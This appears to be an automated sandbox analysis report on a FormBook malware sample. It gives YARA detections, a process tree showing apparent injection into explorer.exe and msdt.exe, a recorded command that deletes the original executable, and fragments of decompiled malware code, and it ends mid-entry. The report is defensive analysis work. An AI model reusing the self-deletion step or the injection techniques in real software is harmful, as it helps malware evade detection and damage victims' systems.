                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.738669459.0000000003659000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: 86dXpRWnFG.exe PID: 6820 Parent PID: 204

                                    General

                                    Start time:08:43:01
                                    Start date:20/11/2020
                                    Path:C:\Users\user\Desktop\86dXpRWnFG.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\86dXpRWnFG.exe
                                    Imagebase:0xe30000
                                    File size:962560 bytes
                                    MD5 hash:221E46C09EB3440BEB5A2256211C3262
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.785152903.00000000014C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.785228330.00000000014F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3424 Parent PID: 6820

                                    General

                                    Start time:08:43:03
                                    Start date:20/11/2020
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:
                                    Imagebase:0x7ff6fee60000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: msdt.exe PID: 4616 Parent PID: 3424

                                    General

                                    Start time:08:43:20
                                    Start date:20/11/2020
                                    Path:C:\Windows\SysWOW64\msdt.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\msdt.exe
                                    Imagebase:0x1300000
                                    File size:1508352 bytes
                                    MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.914480557.0000000003550000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.914598348.0000000003820000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.913261174.0000000000F30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 4808 Parent PID: 4616

                                    General

                                    Start time:08:43:25
                                    Start date:20/11/2020
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\86dXpRWnFG.exe'
                                    Imagebase:0x11d0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 2860 Parent PID: 4808

                                    General

                                    Start time:08:43:25
                                    Start date:20/11/2020
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff724c50000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: 86dXpRWnFG.exe PID: 204 Parent PID: 5912 86dXpRWnFG.exeCOMMON

                                      Executed Functions

                                      Function 00AAB718, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00AAB788
                                      • GetCurrentThread.KERNEL32 ref: 00AAB7C5
                                      • GetCurrentProcess.KERNEL32 ref: 00AAB802
                                      • GetCurrentThreadId.KERNEL32 ref: 00AAB85B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 78a10a847770a2ef199f1e91d77d2b8a7138e0db41cae3289a5331a64758bf66
                                      • Instruction ID: 310963a4986539fc045dd09aa206e68af4668530c95a2f2d58fe490b091074b5
                                      • Opcode Fuzzy Hash: 78a10a847770a2ef199f1e91d77d2b8a7138e0db41cae3289a5331a64758bf66
                                      • Instruction Fuzzy Hash: A85133B09006498FDB50CFA9D588BEEBBF0FF8A314F208469E409A7291D7745845CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAB728, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00AAB788
                                      • GetCurrentThread.KERNEL32 ref: 00AAB7C5
                                      • GetCurrentProcess.KERNEL32 ref: 00AAB802
                                      • GetCurrentThreadId.KERNEL32 ref: 00AAB85B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: c27e27bc6ab0adfa91113b50cf0a5ffcfc7af277cbb81319d50a594b5de46bcf
                                      • Instruction ID: 6a633a5438a8be926bb1dab80be18db0dccdbd62b7ba23f27c76f24dd1a8aaaf
                                      • Opcode Fuzzy Hash: c27e27bc6ab0adfa91113b50cf0a5ffcfc7af277cbb81319d50a594b5de46bcf
                                      • Instruction Fuzzy Hash: CC5143B09006098FDB50CFAAC588BDEBBF0FF89314F208469E509A7391D774A844CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA9430, Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00AA9676
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: fd70472aeccdc930b8cb7d6781b259ce65580d5744d508124ede458e3b87c5c0
                                      • Instruction ID: 6e2924d3fa5b28ddaa371b8aecee38af2cdfa7ff58c1a4fa11580f84a51a4dad
                                      • Opcode Fuzzy Hash: fd70472aeccdc930b8cb7d6781b259ce65580d5744d508124ede458e3b87c5c0
                                      • Instruction Fuzzy Hash: 16711570A00B058FDB64DF69D04579BBBF1FF89314F00892EE55AD7A80DB75E80A8B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAFD8C, Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00AAFEAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 722a9520904a0f76aac1420ecb4fa1cd2a97c450a4a28a843b9353bd52c4e51d
                                      • Instruction ID: 5d4866e5868a8ac3ae45143991f0ce94a53ccc3eda2d4aa2a71ad6bd476b6dae
                                      • Opcode Fuzzy Hash: 722a9520904a0f76aac1420ecb4fa1cd2a97c450a4a28a843b9353bd52c4e51d
                                      • Instruction Fuzzy Hash: 1D51BEB1D003099FDB14CFA9C884ADEBBF5BF89314F24852AE819AB251D775A845CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAFD98, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00AAFEAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: a5f4ae1a251ac4748a866259e1715ca8da72f60740a9b9e3c4eeacaeeb074cb2
                                      • Instruction ID: 8d6fa5cb58d3c16c3bce82ff735b1f3e4638ce76979512ffb47df7d96ff87765
                                      • Opcode Fuzzy Hash: a5f4ae1a251ac4748a866259e1715ca8da72f60740a9b9e3c4eeacaeeb074cb2
                                      • Instruction Fuzzy Hash: 9041BEB1D003099FDB14CFA9C884ADEFBB5BF49314F24852AE819AB251D7759845CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA538D, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00AA5449
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 6c0e716bff735d0c762b68ac5e9027527c11f840d60efa80358f8a1255b481a6
                                      • Instruction ID: 40981d29f831980c22006a9870c3ecfa6c65cc185598c863c2f074ac09e99727
                                      • Opcode Fuzzy Hash: 6c0e716bff735d0c762b68ac5e9027527c11f840d60efa80358f8a1255b481a6
                                      • Instruction Fuzzy Hash: 1941F371C04619CFDB24CFA9C8847DEBBF2BF89308F20806AD519AB251D7755986CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3E20, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00AA5449
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: b490dafaba7af28c9e3f2285ff3ac5256daed88d20f077e0d48f84dde4d4ccd1
                                      • Instruction ID: d7af343b822c270ddc1cdc1de86cf788beba830c0d0a713d2584c2210d6ce89b
                                      • Opcode Fuzzy Hash: b490dafaba7af28c9e3f2285ff3ac5256daed88d20f077e0d48f84dde4d4ccd1
                                      • Instruction Fuzzy Hash: 40410270C04719CBDB24CFA9C8847DEBBF6BF89308F208069D519AB251DBB55946CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA96A9, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00AA9676
                                        • Part of subcall function 00AA8EC8: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AA96F1,00000800,00000000,00000000), ref: 00AA9902
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: HandleLibraryLoadModule
                                      • String ID:
                                      • API String ID: 4133054770-0
                                      • Opcode ID: 25483cbabfa6afad875b79070c6ed47979c7abb6ca9947e68563e15f4fdf9eac
                                      • Instruction ID: 4a1b42c979b2f0e8d08465a179236a9d0e8a39d99cc90716e5b0260c59539b15
                                      • Opcode Fuzzy Hash: 25483cbabfa6afad875b79070c6ed47979c7abb6ca9947e68563e15f4fdf9eac
                                      • Instruction Fuzzy Hash: 571103B2A083448FDB20DF69D8507EBBBF5AFC6314F05846AD449E7292DB749805CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAB948, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAB9D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 86846b4f3446ead2eb5720f95e41962831c74c192ab99aaf60cf2cfee4dcec4e
                                      • Instruction ID: b919905c389f5eb0ed143f5d49a94f22346976edeef4ae647c4c1a2e9b51a561
                                      • Opcode Fuzzy Hash: 86846b4f3446ead2eb5720f95e41962831c74c192ab99aaf60cf2cfee4dcec4e
                                      • Instruction Fuzzy Hash: E72100B59002489FCB10CFAAD484AEEBFF4FB48324F14802AE958A3311C374A955CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAB950, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAB9D7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: e9a0e323e5ebc81b9cf64a4cce18dfbe35e4c5ac4c3980e6b119b49589e71a41
                                      • Instruction ID: 3e497d84503a8c211f3effe7d607404e72872e15907295a58fe4c0b70afb44a6
                                      • Opcode Fuzzy Hash: e9a0e323e5ebc81b9cf64a4cce18dfbe35e4c5ac4c3980e6b119b49589e71a41
                                      • Instruction Fuzzy Hash: 3B21D3B59002499FDB10CFAAD984ADEFBF8FB49324F14841AE919A3350D374A954CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA9890, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AA96F1,00000800,00000000,00000000), ref: 00AA9902
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 3738650ac52421d4d313971c716ed403dfce452c66795a3bf5c4f92088180fdc
                                      • Instruction ID: 386c3945363b07c834559d63650a73b973205b6ddeaf70e966400ccb268d6e88
                                      • Opcode Fuzzy Hash: 3738650ac52421d4d313971c716ed403dfce452c66795a3bf5c4f92088180fdc
                                      • Instruction Fuzzy Hash: 792106B29002499FCB10CFAAD484ADEFBF4AB89324F14852ED455A7610C3759946CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA8EC8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AA96F1,00000800,00000000,00000000), ref: 00AA9902
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 278120cd3ee494baf79705ca4658d357b3a856fa275673b3f5065e443a7c5f64
                                      • Instruction ID: b907be089da52302ab991603c34b0eac3c6125d1b99eed6538c9bd41376b3d13
                                      • Opcode Fuzzy Hash: 278120cd3ee494baf79705ca4658d357b3a856fa275673b3f5065e443a7c5f64
                                      • Instruction Fuzzy Hash: 121103B29002099FCB10CF9AC444ADFFBF4FB49324F14842EE519A7250C3B5A945CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA9610, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00AA9676
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 0909742fe9c7ca3fcfa1b7d2cb457e61cca175784ae6dacde81257e6fad1daf3
                                      • Instruction ID: bec2b6f6063c522567ac0c04ff93e83cd9759bf47905af52ccc6eba5262e0887
                                      • Opcode Fuzzy Hash: 0909742fe9c7ca3fcfa1b7d2cb457e61cca175784ae6dacde81257e6fad1daf3
                                      • Instruction Fuzzy Hash: BB11DFB6C002498FDB10CF9AC444BDEFBF4AF89324F15852AD829B7650C3B9A545CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00225A63, Relevance: 2.7, Strings: 1, Instructions: 1485COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736121635.0000000000222000.00000002.00020000.sdmp, Offset: 00220000, based on PE: true
                                      • Associated: 00000000.00000002.736113493.0000000000220000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.736196541.00000000002E6000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.736228559.000000000030C000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 05dfd4986b659c93b4f72665bf30fe1e38125a7e1538d30845f3b92de8e14818
                                      • Instruction ID: 24b519fdf29fe1b29a85481e6458e78ecea390a07e2324a35fe45b994fae100f
                                      • Opcode Fuzzy Hash: 05dfd4986b659c93b4f72665bf30fe1e38125a7e1538d30845f3b92de8e14818
                                      • Instruction Fuzzy Hash: E9D2662544E3D15FC7238B744CB5A967FB0AE03114B2E4AEFC8C1CA4E3D25D5A9AC762
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAE618, Relevance: .3, Instructions: 315COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 000a5adbc027d36ff3a7f8ba936ea599368c482e26a6222944fb683175cb2e9c
                                      • Instruction ID: de45b16790794584b01c637343b6fb87f81d69e218b47afd869394f3a552a33d
                                      • Opcode Fuzzy Hash: 000a5adbc027d36ff3a7f8ba936ea599368c482e26a6222944fb683175cb2e9c
                                      • Instruction Fuzzy Hash: 6012AAF1C91F458ED314CFA6E8881893B61B755319BE04B08D2623AAD1F7B4216EEF4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAC2B4, Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 332ba7e91e2036f1e865adebdec99401ec4b07bc065d4aa4270a08177bc7c540
                                      • Instruction ID: a5db6b797b3f715c78d0d950fab555681999cc36a3237f43840aef2f61f6ebe4
                                      • Opcode Fuzzy Hash: 332ba7e91e2036f1e865adebdec99401ec4b07bc065d4aa4270a08177bc7c540
                                      • Instruction Fuzzy Hash: CBA16E32E006198FCF15DFB5C9445DEB7F2FF89300B15856AE906AB2A1EB31A915CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAE608, Relevance: .2, Instructions: 222COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.736899672.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67695552e5adb64542212ea0e1f9b5328980ec56cdfb1c7d303765c256ab4fb4
                                      • Instruction ID: ee86d447ba8e5694fc70e0caa574f6e87f3075b63780ab655365ee06ebab893c
                                      • Opcode Fuzzy Hash: 67695552e5adb64542212ea0e1f9b5328980ec56cdfb1c7d303765c256ab4fb4
                                      • Instruction Fuzzy Hash: 3EC11CF1C91B458ED314CFA6E8881893B61BB95329FE04B18D1617B6D0F7B4206EEF48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: 86dXpRWnFG.exe PID: 6820 Parent PID: 204 86dXpRWnFG.exeCOMMON

                                      Executed Functions

                                      Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 23%
                                      			E00419E0A(void* __eax, void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t36;

				asm("lodsd");
				 *(__edx - 0x1374aa1b) =  *(__edx - 0x1374aa1b) << 1;
				_t17 = _a4;
				_t34 = _a4 + 0xc48;
				E0041A960(_t32, _a4, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x414d42
				_t14 =  &_a8; // 0x414d42
				_t22 =  *((intOrPtr*)( *_t34))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t33, _t36); // executed
				return _t22;
			}








                                      0x00419e0a
                                      0x00419e0d
                                      0x00419e13
                                      0x00419e1f
                                      0x00419e27
                                      0x00419e32
                                      0x00419e4d
                                      0x00419e55
                                      0x00419e59

                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: 9c31f9a2a6d1122978f813f0980ad753c70029bfa9984399f8d8b62fca1145a2
                                      • Instruction ID: e89e7652abac12720f5c67d4a4b87e447dd03c11e3e09fd1d5116b5a5f332e44
                                      • Opcode Fuzzy Hash: 9c31f9a2a6d1122978f813f0980ad753c70029bfa9984399f8d8b62fca1145a2
                                      • Instruction Fuzzy Hash: 5BF0F4B2200108AFDB14DF99CC84EEB77A9EF8C754F158649FA1DA7241CA30E951CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                      0x00419e13
                                      0x00419e1f
                                      0x00419e27
                                      0x00419e32
                                      0x00419e4d
                                      0x00419e55
                                      0x00419e59

                                      APIs
                                      • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: BMA$BMA
                                      • API String ID: 2738559852-2163208940
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E0040ACD0(void* __eflags, void* _a4, signed int _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041C650( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_push(_v8);
					_t17 = E0041CA70(_t24, __eflags);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x0040acd9
                                      0x0040acec
                                      0x0040acef
                                      0x0040acf4
                                      0x0040acf9
                                      0x0040ad02
                                      0x0040ad03
                                      0x0040ad08
                                      0x0040ad0b
                                      0x0040ad0d
                                      0x0040ad15
                                      0x0040ad1a
                                      0x0040ad1a
                                      0x0040ad21
                                      0x0040ad29
                                      0x0040ad2c
                                      0x0040ad2e
                                      0x0040ad42
                                      0x00000000
                                      0x0040ad44
                                      0x0040ad4a
                                      0x0040acfe
                                      0x0040acfe
                                      0x0040acfe

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.782865836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
